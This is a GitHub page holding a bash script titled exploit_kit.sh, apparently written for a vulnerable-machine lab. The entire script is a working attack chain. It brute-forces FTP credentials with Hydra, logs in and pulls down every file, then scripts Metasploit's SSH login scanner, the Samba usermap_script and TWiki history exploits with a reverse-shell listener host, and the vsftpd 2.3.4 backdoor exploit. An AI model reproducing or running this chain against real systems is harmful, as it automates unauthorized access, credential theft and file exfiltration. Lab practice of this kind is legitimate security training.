-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit_kit.sh
More file actions
148 lines (118 loc) · 4.43 KB
/
Copy pathexploit_kit.sh
File metadata and controls
148 lines (118 loc) · 4.43 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
#!/bin/bash
# Define the target IP and FTP port
target_ip="<IP>"
ftp_port="21"
ftp_username=""
ftp_password=""
# Function to handle errors and display error message
function handle_error {
local exit_code=$1
local error_message=$2
echo "Error: $error_message (Exit Code: $exit_code)"
exit $exit_code
}
# Function to execute FTP commands and handle errors
function ftp_execute {
local username=$1
local password=$2
local ftp_commands="ls -la\nbinary\nprompt\nmget *\nquit"
echo "FTP login successful with credentials: $username:$password"
echo -e "user $username $password\n$ftp_commands" | ftp -nv $target_ip
if [ $? -ne 0 ]; then
handle_error $? "FTP command execution failed"
fi
}
# FTP Brute Force Attack with Hydra
echo "Performing FTP brute-force on $target_ip"
hydra_result=$(sudo hydra -t 4 -L usernames.txt -P password.txt ftp://$target_ip:$ftp_port)
# Check if Hydra executed successfully
if [ $? -ne 0 ]; then
handle_error $? "Hydra execution failed"
fi
# Check if Hydra found valid credentials
if echo "$hydra_result" | grep -q "login:\|password:"; then
echo "FTP login successful with the following credentials:"
echo "$hydra_result"
# Extract and store the first set of identified credentials
ftp_username=$(echo "$hydra_result" | grep -o "login: \w\+" | cut -d ' ' -f 2 | head -n 1)
ftp_password=$(echo "$hydra_result" | grep -o "password: \w\+" | cut -d ' ' -f 2 | head -n 1)
# FTP Login using the identified credentials and perform ls -la
ftp_execute "$ftp_username" "$ftp_password"
echo " " # Add a space after FTP commands execution
else
echo "FTP login unsuccessful with Hydra."
fi
#need to type "exit" or "exit -y" to exit msfconsole after each exploit is completed to proceed with the next exploit.
# Function to execute msfconsole and run a specific module
function execute_msf_module {
local module_name=$1
local rhost=$2
local user_file=$3
local pass_file=$4
local msf_commands="use $module_name\nset RHOSTS $rhost"
if [ "$module_name" == "auxiliary/scanner/ssh/ssh_login" ]; then
msf_commands+="\nset USERNAME $ftp_username\nset PASSWORD $ftp_password"
fi
if [ "$module_name" == "exploit/multi/samba/usermap_script" ] || [ "$module_name" == "exploit/unix/webapp/twiki_history" ]; then
msf_commands+="\nset LHOST 192.168.40.130"
fi
msf_commands+="\nexploit\nexit\n"
echo -e "$msf_commands" > msf_script.rc
echo "Starting msfconsole..."
# Check if the shell is interactive before executing msfconsole
if [ -t 0 ]; then
msfconsole -q -r msf_script.rc
else
msfconsole -q -r msf_script.rc < /dev/null
fi
if [ $? -ne 0 ]; then
handle_error $? "msfconsole execution failed"
fi
rm -f msf_script.rc
}
# Execute ssh_login auxiliary module with specific credentials
execute_msf_module "auxiliary/scanner/ssh/ssh_login" "192.168.40.128" "" ""
echo "Exploit in Progress"
# Wait for 5 seconds and kill the sessions
sleep 5
echo "Killing the sessions..."
# Check if the shell is interactive before executing msfconsole -x
if [ -t 0 ]; then
msfconsole -q -x "sessions -K"
else
msfconsole -q -x "sessions -K" < /dev/null
fi
echo "exit" | msfconsole -q < /dev/null
# Execute samba/usermap_script exploit
execute_msf_module "exploit/multi/samba/usermap_script" "192.168.40.128" "" ""
echo "Exploit in Progress"
# Wait for 5 seconds and kill the sessions
sleep 5
echo "Killing the sessions..."
# Check if the shell is interactive before executing msfconsole -x
if [ -t 0 ]; then
msfconsole -q -x "sessions -K"
else
msfconsole -q -x "sessions -K" < /dev/null
fi
echo "exit" | msfconsole -q < /dev/null
# Execute unix/webapp/twiki_history exploit
execute_msf_module "exploit/unix/webapp/twiki_history" "192.168.40.128" "" ""
echo "Exploit in Progress"
# Wait for 5 seconds and kill the sessions
sleep 5
echo "Killing the sessions..."
# Check if the shell is interactive before executing msfconsole -x
if [ -t 0 ]; then
msfconsole -q -x "sessions -K"
else
msfconsole -q -x "sessions -K" < /dev/null
fi
echo "exit" | msfconsole -q < /dev/null
# FTP Exploit
listener_port="4445" # Change this to your desired listener port
echo -e "use exploit/unix/ftp/vsftpd_234_backdoor\nset RHOST $target_ip\nexploit -j\n" > msf_ftp_script.rc
echo "Final FTP Exploit in Progress"
echo "Starting msfconsole for FTP exploit..."
msfconsole -q -r msf_ftp_script.rc
rm -f msf_ftp_script.rc